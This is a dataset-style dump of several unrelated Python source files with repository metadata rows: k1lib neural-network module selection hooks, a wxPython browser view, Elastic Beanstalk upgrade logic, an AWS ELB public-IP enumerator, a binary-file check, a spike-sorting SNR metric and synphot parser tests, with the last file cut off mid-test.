def named_children(self, prop:str=None) -> Iterator[Tuple[str, ModuleSelector]]:
"""Get all named direct childs.
:param prop: Filter property. See also: :meth:`__contains__`"""
if prop is None: return self._children.items()
return ((k, v) for k, v in self._children.items() if prop in v)
@k1lib.patch(ModuleSelector)
def children(self, prop:str=None) -> Iterator[ModuleSelector]:
"""Get all direct childs.
:param prop: Filter property. See also: :meth:`__contains__`"""
return (x for _, x in self.named_children(prop))
@k1lib.patch(ModuleSelector, "directParams")
@property
def directParams(self) -> Dict[str, nn.Parameter]:
"""Dict params directly under this module"""
return {name: param for name, param in self.nn.named_parameters() if "." not in name}
@k1lib.patch(ModuleSelector)
def named_modules(self, prop:str=None) -> Iterator[Tuple[str, ModuleSelector]]:
"""Get all named child recursively.
Example::
modules = list(nn.Sequential(nn.Linear(3, 4), nn.ReLU()).select().named_modules())
# return 3
len(modules)
# return tuple ('0', <ModuleSelector of Linear>)
modules[1]
:param prop: Filter property. See also: :meth:`__contains__`"""
if prop != None:
yield from ((name, m) for name, m in self.named_modules() if prop in m)
return
yield self.name, self
for child in self._children.values(): yield from child.named_modules()
@k1lib.patch(ModuleSelector)
def modules(self, prop:str=None) -> Iterator[ModuleSelector]:
"""Get all child recursively.
:param prop: Filter property. See also: :meth:`__contains__`"""
for name, x in self.named_modules(prop): yield x
@k1lib.patch(ModuleSelector)
def clearProps(self) -> "ModuleSelector":
"""Clears all existing props of this and all descendants
:class:`ModuleSelector`. Example::
# returns False
"b" in nn.Linear(3, 4).select("*:b").clearProps()"""
def applyF(self): self.props = []
self.apply(applyF); return self
@k1lib.patch(ModuleSelector, name="deepestDepth")
@property
def deepestDepth(self):
"""Deepest depth of the tree. If self doesn't
have any child, then depth is 0"""
if len(self._children) == 0: return 0
return 1 + max([child.deepestDepth for child in self._children.values()])
@k1lib.patch(ModuleSelector)
def __repr__(self, intro:bool=True, header:Union[str, Tuple[str]]="", footer="", tabs:int=None):
"""
:param intro: whether to include a nice header and footer info
:param header:
str: include a header that starts where `displayF` will start
Tuple[str, str]: first one in tree, second one in displayF section
:param footer: same thing with header, but at the end
:param header: include a header that starts where `displayF` will start
:param tabs: number of tabs at the beginning. Best to leave this empty
"""
if tabs == None: tabs = 5 + self.deepestDepth
answer = "ModuleSelector:\n" if intro else ""
if header:
h1, h2 = ("", header) if isinstance(header, str) else header
answer += h1.ljust(tabs*4, " ") + h2 + "\n"
answer += f"{self.name}: {self.nn.__class__.__name__}".ljust(tabs*4, " ")
answer += self.displayF(self) + ("\n" if len(self._children) > 0 else "")
answer += k1lib.tab("\n".join([child.__repr__(tabs=tabs-1, intro=False) for name, child in self._children.items()]))
if footer:
f1, f2 = ("", footer) if isinstance(footer, str) else footer
answer += "\n" + f1.ljust(tabs*4, " ") + f2
if intro: answer += f"""\n\nCan...
- mS.deepestDepth: get deepest depth possible
- mS.nn: get the underlying nn.Module object
- mS.apply(f): apply to self and all descendants
- "HookModule" in mS: whether this module has a specified prop
- mS.highlight(prop): highlights all modules with specified prop
- mS.parse([..., ...]): parses extra css
- mS.directParams: get Dict[str, nn.Parameter] that are directly under this module"""
return answer
def _strTensor(t): return "None" if t is None else f"{t.shape}"
def strTensorTuple(ts):
if len(ts) > 1:
shapes = "\n".join(f"- {_strTensor(t)}" for t in ts)
return f"tensors ({len(ts)} total) shapes:\n{shapes}"
else:
return f"tensor shape: {_strTensor(ts[0])}"
@k1lib.patch(ModuleSelector)
@contextmanager
def hookF(self, f:Callable[[ModuleSelector, "torch.nn.Module", Tuple[torch.Tensor], torch.Tensor], None]=None, prop:str="*"):
"""Context manager for applying forward hooks.
Example::
def f(mS, m, i, o):
print(i, o)
m = nn.Linear(3, 4)
with m.select().hookF(f):
m(torch.randn(2, 3))
:param f: hook callback, should accept :class:`ModuleSelector`, inputs and output
:param prop: filter property of module to hook onto. If not specified, then it will print out input and output tensor shapes."""
if f is None: f = lambda mS, i, o: print(f"Forward hook {m}:\n" + k1lib.tab(f"Input {strTensorTuple(i)}\nOutput tensor shape: {o.shape}"))
g = lambda m, i, o: f(self, i, o)
handles = [m.nn.register_forward_hook(g) for m in self.modules(prop)]
try: yield
finally:
for h in handles: h.remove()
@k1lib.patch(ModuleSelector)
@contextmanager
def hookFp(self, f=None, prop:str="*"):
"""Context manager for applying forward pre hooks.
Example::
def f(mS, m, i):
print(i)
m = nn.Linear(3, 4)
with m.select().hookFp(f):
m(torch.randn(2, 3))
:param f: hook callback, should accept :class:`ModuleSelector` and inputs
:param prop: filter property of module to hook onto. If not specified, then it will print out input tensor shapes."""
if f is None: f = lambda mS, i: print(f"Forward pre hook {m}:\n" + k1lib.tab(f"Input {strTensorTuple(i)}"))
g = lambda m, i: f(self, i)
handles = [m.nn.register_forward_pre_hook(g) for m in self.modules(prop)]
try: yield
finally:
for h in handles: h.remove()
@k1lib.patch(ModuleSelector)
@contextmanager
def hookB(self, f=None, prop:str="*"):
"""Context manager for applying backward hooks.
Example::
def f(mS, m, i, o):
print(i, o)
m = nn.Linear(3, 4)
with m.select().hookB(f):
m(torch.randn(2, 3)).sum().backward()
:param f: hook callback, should accept :class:`ModuleSelector`, grad inputs and outputs
:param prop: filter property of module to hook onto. If not specified, then it will print out input tensor shapes."""
if f is None: f = lambda mS, i, o: print(f"Backward hook {m}:\n" + k1lib.tab(f"Input {strTensorTuple(i)}\nOutput {strTensorTuple(o)}"))
g = lambda m, i, o: f(self, i, o)
handles = [m.nn.register_full_backward_hook(g) for m in self.modules(prop)]
try: yield
finally:
for h in handles: h.remove()
from contextlib import ExitStack
@contextmanager
def _freeze(self, value:bool, prop:str):
modules = [m for m in self.modules(prop)]
with ExitStack() as stack:
for m in self.modules(prop):
stack.enter_context(m.nn.gradContext())
m.nn.requires_grad_(value)
try: yield
finally: pass
@k1lib.patch(ModuleSelector)
def freeze(self, prop:str="*"):
"""Returns a context manager that freezes (set requires_grad to False) parts of
the network. Example::
l = k1lib.Learner.sample()
w = l.model.lin1.lin.weight.clone() # weights before
with l.model.select("#lin1").freeze():
l.run(1)
# returns True
(l.model.lin1.lin.weight == w).all()"""
return _freeze(self, False, prop)
@k1lib.patch(ModuleSelector)
def unfreeze(self, prop:str="*"):
"""Returns a context manager that unfreezes (set requires_grad to True) parts of
the network. Example::
l = k1lib.Learner.sample()
w = l.model.lin1.lin.weight.clone() # weights before
with l.model.select("#lin1").freeze():
with l.model.select("#lin1 > #lin").unfreeze():
l.run(1)
# returns False
(l.model.lin1.lin.weight == w).all()"""
return _freeze(self, True, prop) | 43.426554 | 280 | 0.656866 | 2,541 | 0.16529 | 3,431 | 0.223184 | 11,183 | 0.727444 | 0 | 0 | 6,935 | 0.451116 |
907cab399c56f59d773c9098dcb9ad23a5c47d44 | 3,482 | py | Python | plugins/General/wxRaven_WebBrowser.py | sLiinuX/wxRaven | a513a029fa1ff2059ee262c524b4b2b45111f1a6 | [
"MIT"
]
| 11 | 2021-12-20T15:32:17.000Z | 2022-03-16T03:54:02.000Z | plugins/General/wxRaven_WebBrowser.py | sLiinuX/wxRaven | a513a029fa1ff2059ee262c524b4b2b45111f1a6 | [
"MIT"
]
| 156 | 2021-12-31T21:01:31.000Z | 2022-03-20T21:57:31.000Z | plugins/General/wxRaven_WebBrowser.py | sLiinuX/wxRaven | a513a029fa1ff2059ee262c524b4b2b45111f1a6 | [
"MIT"
]
| 3 | 2022-01-21T14:52:43.000Z | 2022-02-12T05:32:19.000Z | '''
Created on 22 févr. 2022
@author: slinux
'''
from .wxRavenGeneralDesign import wxRavenWebBrowser
from wxRavenGUI.application.wxcustom.CustomLoading import *
from wxRavenGUI.application.wxcustom import *
import wx.html2 as webview
import sys
import logging
from wxRavenGUI.application.wxcustom.CustomUserIO import UserAdvancedMessage
class wxRaven_WebBrowserLogic(wxRavenWebBrowser):
'''
classdocs
'''
#
# Datas for the plugin display style
#
#
view_base_name = "WebBrowser"
view_name = "WebBrowser"
parent_frame = None
default_position = "main"
icon = 'internal_browser'#wx.Bitmap( u"res/default_style/normal/help_view.png", wx.BITMAP_TYPE_ANY )
def __init__(self, parentFrame, position = "main", viewName= "WebBrowser", isInternalPluginView=False, url=''):
'''
Constructor
'''
super().__init__(parent=parentFrame)
#
# Your constructor here
#
self.view_base_name = "WebBrowser"
self.view_name = viewName
self.parent_frame = parentFrame
self.default_position = position
self._loadingPanel = None
parentFrame.RessourcesProvider.ApplyThemeOnPanel(self)
#This is to add the view in the appropriate place using the mainapp to do so
#
#The only exception is when the pannel itself is called by the plugin or another view
#In this case the position in main app must not be managed (see rpc command panel as example)
#
if not isInternalPluginView:
parentFrame.Add(self, self.view_name ,position, parentFrame.RessourcesProvider.GetImage(self.icon))
#is_windows = hasattr(sys, 'getwindowsversion')
#if is_windows:
# self.WindowsSetup()
self.wv=wxRavenWebview.GetWebView(self.m_webPan)
'''
is_windows = hasattr(sys, 'getwindowsversion')
if is_windows:
webview.WebView.MSWSetEmulationLevel(webview.WEBVIEWIE_EMU_IE11)
_backend = self.GetAvailableBackend(_windows=True)
if _backend == None:
UserAdvancedMessage(parentFrame, "Unable to find a backend for the webview, \n please verify you do have the webview component or download it (url in details)", "Error", "https://developer.microsoft.com/en-us/microsoft-edge/webview2/", showCancel=False)
self.wv = webview.WebView.New(self, backend=_backend)
else:
self.wv= webview.WebView.New(self)
'''
self.bSizer1 = wx.BoxSizer( wx.VERTICAL )
self.bSizer1.Add( self.wv, 1, wx.ALL|wx.EXPAND, 5 )
self.m_webPan.SetSizer( self.bSizer1 )
self.Layout()
self.m_buttonGo.Bind(wx.EVT_BUTTON,self.GetUrl )
if url == '':
pass
#self.LoadRavencoinIPFS()
else:
self.GetURL(url)
def UpdateView(self, evt=None):
pass
def GetUrl(self, evt):
url = self.m_textCtrlURL.GetValue()
self.wv.LoadURL(url)
def OpenUrl(self, url_text, _writeInAddress=True):
if _writeInAddress:
self.m_textCtrlURL.SetValue(url_text)
self.wv.LoadURL(url_text)
| 30.017241 | 269 | 0.601091 | 3,118 | 0.895205 | 0 | 0 | 0 | 0 | 0 | 0 | 1,408 | 0.404249 |
907d53bdf5f863a5b666758a3f35cfee8a3a43e9 | 4,097 | py | Python | backend/pollr-eb2/lib/python3.5/site-packages/ebcli/operations/upgradeops.py | saarthak24/Pollr | 9fbdd19f48ed873899093c7d034ed4e0d017c19d | [
"MIT"
]
| 2 | 2017-11-16T15:02:43.000Z | 2017-11-20T17:41:16.000Z | backend/pollr-eb2/lib/python3.5/site-packages/ebcli/operations/upgradeops.py | saarthak24/Pollr | 9fbdd19f48ed873899093c7d034ed4e0d017c19d | [
"MIT"
]
| 10 | 2020-01-28T22:12:06.000Z | 2022-03-11T23:16:53.000Z | backend/pollr-eb2/lib/python3.5/site-packages/ebcli/operations/upgradeops.py | saarthak24/Pollr | 9fbdd19f48ed873899093c7d034ed4e0d017c19d | [
"MIT"
]
| 2 | 2017-11-16T14:59:03.000Z | 2017-11-16T23:52:13.000Z | # Copyright 2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from ebcli.objects.platform import PlatformVersion
from ..resources.strings import prompts
from ..resources.statics import namespaces, option_names
from ..core import io
from ..lib import elasticbeanstalk
from . import commonops
def _get_warning_message(confirm, single, rolling_enabled, webserver, noroll):
if confirm:
return None
elif single:
return prompts['upgrade.singleinstance']
elif not rolling_enabled and noroll:
return prompts['upgrade.norollingforce']
elif not rolling_enabled:
if webserver:
type = 'Health'
else:
type = 'Time'
return prompts['upgrade.norollingapply'].format(type)
elif rolling_enabled:
return prompts['upgrade.rollingupdate']
def _should_add_rolling(single, rolling_enabled, noroll):
if noroll:
return False
if single:
return False
if rolling_enabled:
return False
return True
def upgrade_env(app_name, env_name, timeout, confirm, noroll):
env = elasticbeanstalk.get_environment_settings(app_name, env_name)
latest = commonops.get_latest_solution_stack(env.platform.version)
if latest == env.platform:
io.echo(prompts['upgrade.alreadylatest'])
return
else:
single = elasticbeanstalk.get_option_setting(
env.option_settings, namespaces.ENVIRONMENT,
'EnvironmentType') == 'SingleInstance'
rolling_enabled = elasticbeanstalk.get_option_setting(
env.option_settings, namespaces.ROLLING_UPDATES,
option_names.ROLLING_UPDATE_ENABLED) == 'true'
webserver = env.tier.name.lower() == 'webserver'
io.echo()
io.echo(prompts['upgrade.infodialog'].format(env_name))
io.echo('Current platform:', env.platform)
io.echo('Latest platform: ', latest)
io.echo()
warning = _get_warning_message(confirm, single,
rolling_enabled, webserver, noroll)
if warning:
io.log_warning(warning)
io.echo(prompts['upgrade.altmessage'])
io.echo()
if not confirm:
# Get confirmation
io.validate_action(prompts['upgrade.validate'], env.name)
add_rolling = _should_add_rolling(single, rolling_enabled, noroll)
do_upgrade(env_name, add_rolling, timeout, latest.name,
health_based=webserver, platform_arn = latest.version)
def do_upgrade(env_name, add_rolling, timeout, solution_stack_name,
health_based=False, platform_arn=None):
if add_rolling:
if health_based:
roll_type = 'Health'
else:
roll_type = 'Time'
changes = [
elasticbeanstalk.create_option_setting(
namespaces.ROLLING_UPDATES,
option_names.ROLLING_UPDATE_ENABLED,
'true'),
elasticbeanstalk.create_option_setting(
namespaces.ROLLING_UPDATES,
option_names.ROLLING_UPDATE_TYPE,
roll_type)
]
io.log_warning(prompts['upgrade.applyrolling'].format(roll_type))
else:
changes = None
if PlatformVersion.is_valid_arn(platform_arn):
commonops.update_environment(
env_name, changes, None, timeout=timeout,
platform_arn=platform_arn)
else:
commonops.update_environment(
env_name, changes, None, timeout=timeout,
solution_stack_name=solution_stack_name) | 35.626087 | 78 | 0.661948 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 887 | 0.2165 |
907e1b4a54a9e37e87ee07e0eb6f6b12a199f562 | 2,719 | py | Python | src/perimeterator/enumerator/elb.py | vvondra/perimeterator | 6f750b5c8e6ff151472911bb45c6f11c0a6cd8ff | [
"MIT"
]
| null | null | null | src/perimeterator/enumerator/elb.py | vvondra/perimeterator | 6f750b5c8e6ff151472911bb45c6f11c0a6cd8ff | [
"MIT"
]
| null | null | null | src/perimeterator/enumerator/elb.py | vvondra/perimeterator | 6f750b5c8e6ff151472911bb45c6f11c0a6cd8ff | [
"MIT"
]
| null | null | null | ''' Perimeterator - Enumerator for AWS ELBs (Public IPs). '''
import logging
import boto3
from perimeterator.helper import aws_elb_arn
from perimeterator.helper import dns_lookup
class Enumerator(object):
''' Perimeterator - Enumerator for AWS ELBs (Public IPs). '''
# Required for Boto and reporting.
SERVICE = 'elb'
def __init__(self, region):
self.logger = logging.getLogger(__name__)
self.region = region
self.client = boto3.client(self.SERVICE, region_name=region)
def get(self):
''' Attempt to get all Public IPs from ELBs. '''
resources = []
# Iterate over results until AWS no longer returns a 'NextMarker' in
# order to ensure all results are retrieved.
marker = ''
while marker is not None:
# Unfortunately, Marker=None or Marker='' is invalid for this API
# call, so it looks like we can't just set this to a None value,
# or use a ternary here.
if marker:
candidates = self.client.describe_load_balancers(
Marker=marker
)
else:
candidates = self.client.describe_load_balancers()
# Check if we need to continue paging.
if "NextMarker" in candidates:
self.logger.debug(
"'NextMarker' found, additional page of results to fetch"
)
marker = candidates["NextMarker"]
else:
marker = None
# For some odd reason the AWS API doesn't appear to allow a
# filter on describe operations for ELBs, so we'll have to filter
# manually.
for elb in candidates["LoadBalancerDescriptions"]:
self.logger.debug(
"Inspecting ELB %s", elb["LoadBalancerName"],
)
if elb["Scheme"] != "internet-facing":
self.logger.debug("ELB is not internet facing")
continue
# Lookup the DNS name for this ELB to get the current IPs. We
# also need to construct the ARN, as it's not provided in the
# output from a describe operation (?!)
resources.append({
"service": self.SERVICE,
"identifier": aws_elb_arn(
self.region,
elb["LoadBalancerName"]
),
"cname": elb["DNSName"],
"addresses": dns_lookup(elb["DNSName"]),
})
self.logger.info("Got IPs for %s resources", len(resources))
return resources
| 37.246575 | 77 | 0.543582 | 2,535 | 0.932328 | 0 | 0 | 0 | 0 | 0 | 0 | 1,108 | 0.407503 |
907f3c024ac75afd4ff1f45c65ec5e6e22c38567 | 1,685 | py | Python | binarycheck.py | pnordin/trimeol | 2f58db29df9b28f249c1b9fa851f04119158bbd5 | [
"MIT"
]
| null | null | null | binarycheck.py | pnordin/trimeol | 2f58db29df9b28f249c1b9fa851f04119158bbd5 | [
"MIT"
]
| null | null | null | binarycheck.py | pnordin/trimeol | 2f58db29df9b28f249c1b9fa851f04119158bbd5 | [
"MIT"
]
| null | null | null | """Module to help guess whether a file is binary or text.
Requirements:
Python 2.7+
Recommended:
Python 3
"""
def is_binary_file(fname):
"""Attempt to guess if 'fname' is a binary file heuristically.
This algorithm has many flaws. Use with caution.
It assumes that if a part of the file has NUL bytes
or has more control characters than text characters,
it is a binary file.
Additionally, an ASCII compatible character set is assumed.
Returns True if 'fname' appears to be a binary file.
"""
with open(fname, 'rb') as fh:
chunk = fh.read(1024)
if not chunk: # Empty file
return False
if b'\x00' in chunk: # Has NUL bytes
return True
ncontrol = control_char_count(chunk)
ntext = len(chunk) - ncontrol
return ncontrol > ntext
def is_control_char(c):
"""Return True if 'c' is a control character.
c is considered a control character if
it is outside of the extended ASCII set or
has a code below 32 with some exclusions.
An ASCII compatible character set is assumed.
"""
charcode = 0
# The following assignment
# should make this module compatible with
# at least Python 2.7 (tested on 2.7.9).
try:
charcode = ord(c)
except TypeError:
charcode = c
excludes = ("\t", "\r", "\n")
if charcode in [ord(char) for char in excludes]:
return False
return (charcode < 32 or
charcode > 255)
def control_char_count(data):
"""Return the count of control characters in 'data'."""
n = 0
for c in data:
if is_control_char(c):
n += 1
return n
| 25.923077 | 66 | 0.626113 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 955 | 0.566766 |
9080c3b939a2c1af97171c5d7d2b2932cf209fec | 8,329 | py | Python | spiketoolkit/validation/quality_metric_classes/snr.py | seankmartin/spiketoolkit | 38261d95045b1cd689363579c10ab3aa0a1ab7c0 | [
"MIT"
]
| null | null | null | spiketoolkit/validation/quality_metric_classes/snr.py | seankmartin/spiketoolkit | 38261d95045b1cd689363579c10ab3aa0a1ab7c0 | [
"MIT"
]
| null | null | null | spiketoolkit/validation/quality_metric_classes/snr.py | seankmartin/spiketoolkit | 38261d95045b1cd689363579c10ab3aa0a1ab7c0 | [
"MIT"
]
| null | null | null | import numpy as np
import spikemetrics.metrics as metrics
from .utils.thresholdcurator import ThresholdCurator
from .quality_metric import QualityMetric
import spiketoolkit as st
from spikemetrics.utils import Epoch, printProgressBar
from collections import OrderedDict
from .parameter_dictionaries import get_recording_gui_params, get_feature_gui_params
def make_curator_gui_params(params):
keys = list(params.keys())
types = [type(params[key]) for key in keys]
values = [params[key] for key in keys]
gui_params = [{'name': keys[0], 'type': str(types[0].__name__), 'value': values[0], 'default': values[0], 'title': "Mode to compute noise SNR ('mad' | 'std' - default 'mad')"},
{'name': keys[1], 'type': str(types[1].__name__), 'value': values[1], 'default': values[1], 'title': "Number of seconds to compute noise level from (default 10.0)"},
{'name': keys[2], 'type': str(types[2].__name__), 'value': values[2], 'default': values[2], 'title': "Maximum number of spikes to compute templates from (default 1000)"},
{'name': keys[3], 'type': str(types[3].__name__), 'value': values[3], 'default': values[3], 'title': "Use 'mean' or 'median' to compute templates"},
{'name': keys[4], 'type': str(types[4].__name__), 'value': values[4], 'default': values[4], 'title': "If maximum channel has to be found among negative peaks ('neg'), positive ('pos') or both ('both' - default)"},
{'name': keys[5], 'type': 'int', 'value': values[5], 'default': values[5], 'title': "Random seed for reproducibility"},
{'name': keys[6], 'type': str(types[6].__name__), 'value': values[6], 'default': values[6], 'title': "If True, will be verbose in metric computation."},]
curator_gui_params = [{'name': 'threshold', 'type': 'float', 'title': "The threshold for the given metric."},
{'name': 'threshold_sign', 'type': 'str',
'title': "If 'less', will threshold any metric less than the given threshold. "
"If 'less_or_equal', will threshold any metric less than or equal to the given threshold. "
"If 'greater', will threshold any metric greater than the given threshold. "
"If 'greater_or_equal', will threshold any metric greater than or equal to the given threshold."}]
gui_params = curator_gui_params + gui_params + get_recording_gui_params() + get_feature_gui_params()
return gui_params
class SNR(QualityMetric):
installed = True # check at class level if installed or not
installation_mesg = "" # err
params = OrderedDict([('snr_mode',"mad"), ('snr_noise_duration',10.0), ('max_spikes_per_unit_for_snr',1000),
('template_mode', "median"), ('max_channel_peak', "both"), ('seed',None), ('verbose',False)])
curator_name = "ThresholdSNR"
curator_gui_params = make_curator_gui_params(params)
def __init__(self, metric_data):
QualityMetric.__init__(self, metric_data, metric_name="snr")
if not metric_data.has_recording():
raise ValueError("MetricData object must have a recording")
def compute_metric(self, snr_mode, snr_noise_duration, max_spikes_per_unit_for_snr,
template_mode, max_channel_peak, save_features_props,
recompute_info, seed, save_as_property):
snrs_epochs = []
for epoch in self._metric_data._epochs:
epoch_recording = self._metric_data._recording.get_epoch(epoch[0])
epoch_sorting = self._metric_data._sorting.get_epoch(epoch[0])
channel_noise_levels = _compute_channel_noise_levels(
recording=epoch_recording,
mode=snr_mode,
noise_duration=snr_noise_duration,
seed=seed,
)
templates = st.postprocessing.get_unit_templates(
epoch_recording,
epoch_sorting,
unit_ids=self._metric_data._unit_ids,
max_spikes_per_unit=max_spikes_per_unit_for_snr,
mode=template_mode,
save_wf_as_features=save_features_props,
recompute_waveforms=recompute_info,
save_as_property=save_features_props,
seed=seed,
)
max_channels = st.postprocessing.get_unit_max_channels(
epoch_recording,
epoch_sorting,
unit_ids=self._metric_data._unit_ids,
max_spikes_per_unit=max_spikes_per_unit_for_snr,
peak=max_channel_peak,
recompute_templates=recompute_info,
save_as_property=save_features_props,
mode=template_mode,
seed=seed,
)
snr_list = []
for i, unit_id in enumerate(self._metric_data._unit_ids):
if self._metric_data.verbose:
printProgressBar(i + 1, len(self._metric_data._unit_ids))
max_channel_idx = epoch_recording.get_channel_ids().index(
max_channels[i]
)
snr = _compute_template_SNR(
templates[i], channel_noise_levels, max_channel_idx
)
snr_list.append(snr)
snrs = np.asarray(snr_list)
snrs_epochs.append(snrs)
if save_as_property:
self.save_as_property(self._metric_data._sorting, snrs_epochs, self._metric_name)
return snrs_epochs
def threshold_metric(self, threshold, threshold_sign, snr_mode, snr_noise_duration, max_spikes_per_unit_for_snr,
template_mode, max_channel_peak, save_features_props, recompute_info,
seed, save_as_property):
snrs_epochs = self.compute_metric(snr_mode, snr_noise_duration, max_spikes_per_unit_for_snr,
template_mode, max_channel_peak, save_features_props,
recompute_info, seed, save_as_property)[0]
threshold_curator = ThresholdCurator(
sorting=self._metric_data._sorting, metrics_epoch=snrs_epochs
)
threshold_curator.threshold_sorting(
threshold=threshold, threshold_sign=threshold_sign
)
return threshold_curator
def _compute_template_SNR(template, channel_noise_levels, max_channel_idx):
"""
Computes SNR on the channel with largest amplitude
Parameters
----------
template: np.array
Template (n_elec, n_timepoints)
channel_noise_levels: list
Noise levels for the different channels
max_channel_idx: int
Index of channel with largest templaye
Returns
-------
snr: float
Signal-to-noise ratio for the template
"""
snr = (
np.max(np.abs(template[max_channel_idx]))
/ channel_noise_levels[max_channel_idx]
)
return snr
def _compute_channel_noise_levels(recording, mode, noise_duration, seed):
"""
Computes noise level channel-wise
Parameters
----------
recording: RecordingExtractor
The recording ectractor object
mode: str
'std' or 'mad' (default
noise_duration: float
Number of seconds to compute SNR from
Returns
-------
moise_levels: list
Noise levels for each channel
"""
M = recording.get_num_channels()
n_frames = int(noise_duration * recording.get_sampling_frequency())
if n_frames >= recording.get_num_frames():
start_frame = 0
end_frame = recording.get_num_frames()
else:
start_frame = np.random.RandomState(seed=seed).randint(
0, recording.get_num_frames() - n_frames
)
end_frame = start_frame + n_frames
X = recording.get_traces(start_frame=start_frame, end_frame=end_frame)
noise_levels = []
for ch in range(M):
if mode == "std":
noise_level = np.std(X[ch, :])
elif mode == "mad":
noise_level = np.median(np.abs(X[ch, :]) / 0.6745)
else:
raise Exception("'mode' can be 'std' or 'mad'")
noise_levels.append(noise_level)
return noise_levels | 46.792135 | 231 | 0.623724 | 3,900 | 0.468243 | 0 | 0 | 0 | 0 | 0 | 0 | 2,152 | 0.258374 |
90818fc965fccbf18cf4f96b17fab97a599e1aaa | 824 | py | Python | parser/fase2/team16/main.py | webdev188/tytus | 847071edb17b218f51bb969d335a8ec093d13f94 | [
"MIT"
]
| null | null | null | parser/fase2/team16/main.py | webdev188/tytus | 847071edb17b218f51bb969d335a8ec093d13f94 | [
"MIT"
]
| null | null | null | parser/fase2/team16/main.py | webdev188/tytus | 847071edb17b218f51bb969d335a8ec093d13f94 | [
"MIT"
]
| 4 | 2020-12-19T17:12:13.000Z | 2021-01-07T20:29:53.000Z | # This is a sample Python script.
# Press Mayús+F10 to execute it or replace it with your code.
# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.
import Gramatica as g
import interprete as Inter
import ts as TS
import jsonMode as JSON_INGE
import jsonMode as json
import Instruccion as INST
import Interfaz.Interfaz as Gui
import os
import glob
from os import path
from os import remove
def print_hi(name):
# Use a breakpoint in the code line below to debug your script.
print(f'Hi, {name}') # Press Ctrl+F8 to toggle the breakpoint.
if __name__ == '__main__':
Gui.principal
cadena= "goto"
# for n in cadena:
# in
print("ELIMINANDO...")
files = glob.glob('data/json/*')
for ele in files:
os.remove(ele)
| 18.311111 | 98 | 0.694175 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 380 | 0.460606 |
90825885fb1011eb6a66d72e387d9a860b8e8b3f | 19,132 | py | Python | stsynphot/tests/test_parser.py | tddesjardins/stsynphot_refactor | d7c6cdd006a2173fe0ee367a3a9f10f72acafe38 | [
"MIT",
"BSD-3-Clause"
]
| 5 | 2017-07-18T20:02:34.000Z | 2022-03-10T06:46:22.000Z | stsynphot/tests/test_parser.py | tddesjardins/stsynphot_refactor | d7c6cdd006a2173fe0ee367a3a9f10f72acafe38 | [
"MIT",
"BSD-3-Clause"
]
| 103 | 2016-05-26T03:40:24.000Z | 2021-12-29T23:03:13.000Z | stsynphot/tests/test_parser.py | tddesjardins/stsynphot_refactor | d7c6cdd006a2173fe0ee367a3a9f10f72acafe38 | [
"MIT",
"BSD-3-Clause"
]
| 9 | 2016-12-14T12:56:18.000Z | 2021-09-11T22:50:01.000Z | # Licensed under a 3-clause BSD style license - see LICENSE.rst
"""Test spparser.py module, which uses spark.py.
.. note::
Only testing to see if the parser makes the right kind of
objects. Quality of the data is tested in other modules.
"""
# STDLIB
import os
# THIRD-PARTY
import pytest
from astropy import units as u
from astropy.tests.helper import assert_quantity_allclose
from astropy.utils.exceptions import AstropyUserWarning
from numpy.testing import assert_allclose
# SYNPHOT
from synphot import exceptions as synexceptions
from synphot import units
from synphot.models import (BlackBodyNorm1D, Box1D, ConstFlux1D, Empirical1D,
GaussianFlux1D, PowerLawFlux1D)
from synphot.reddening import ExtinctionCurve
from synphot.spectrum import SourceSpectrum, SpectralElement
# LOCAL
from .. import catalog, exceptions, observationmode, spectrum, spparser
from ..config import conf
from ..stio import resolve_filename
def _single_functioncall(sp, ans_cls, ans_model, ans_name, ans_z=0):
assert isinstance(sp, ans_cls)
# Do not check composite model
if ans_model is not None:
assert isinstance(sp.model, ans_model)
if ans_name:
assert sp.meta['expr'] == ans_name
if ans_z is not None:
assert_allclose(sp.z, ans_z)
def _compare_spectra(sp1, sp2):
"""Test that two spectra are basically equivalent."""
if sp1.waveset is None:
assert sp2.waveset is None
w = [100, 5000, 11000] * u.AA
else:
w = sp1.waveset
assert_quantity_allclose(w, sp2.waveset)
assert_quantity_allclose(sp1(w), sp2(w))
assert_quantity_allclose(sp1.integrate(wavelengths=w),
sp2.integrate(wavelengths=w))
assert type(sp1.model.__class__) == type(sp2.model.__class__) # noqa
if hasattr(sp1, 'z'):
assert sp1.z == sp2.z
def test_unit_1_flam():
sp1 = spparser.parse_spec('unit(1, flam)')
_single_functioncall(sp1, SourceSpectrum, ConstFlux1D, 'unit(1.0,flam)')
sp2 = SourceSpectrum(ConstFlux1D, amplitude=1 * units.FLAM)
_compare_spectra(sp1, sp2)
def test_bb_5000():
sp1 = spparser.parse_spec('bb(5000)')
_single_functioncall(sp1, SourceSpectrum, BlackBodyNorm1D, 'bb(5000.0)')
sp2 = SourceSpectrum(BlackBodyNorm1D, temperature=5000 * u.K)
_compare_spectra(sp1, sp2)
def test_powerlaw_5000_1_flam():
sp1 = spparser.parse_spec('pl(5000, 1, flam)')
_single_functioncall(
sp1, SourceSpectrum, PowerLawFlux1D, 'pl(5000.0,1.0,flam)')
sp2 = SourceSpectrum(PowerLawFlux1D, amplitude=1 * units.FLAM,
x_0=5000 * u.AA, alpha=-1)
_compare_spectra(sp1, sp2)
def test_box_5000_1():
sp1 = spparser.parse_spec('box(5000, 1)')
_single_functioncall(sp1, SpectralElement, Box1D, 'box(5000.0,1.0)',
ans_z=None)
sp2 = SpectralElement(Box1D, amplitude=1, x_0=5000 * u.AA, width=1 * u.AA)
_compare_spectra(sp1, sp2)
def test_em_5000_25_1_flam():
sp1 = spparser.parse_spec('em(5000, 25, 1, flam)')
_single_functioncall(
sp1, SourceSpectrum, GaussianFlux1D, 'em(5000, 25, 1, FLAM)')
f = 1 * (units.FLAM * u.AA) # Integrated flux
sp2 = SourceSpectrum(
GaussianFlux1D, mean=5000 * u.AA, fwhm=25 * u.AA, total_flux=f)
_compare_spectra(sp1, sp2)
def test_rn_bb_box_abmag():
sp1 = spparser.parse_spec('rn(bb(5000), box(5000, 10), 17, abmag)')
_single_functioncall(sp1, SourceSpectrum, None,
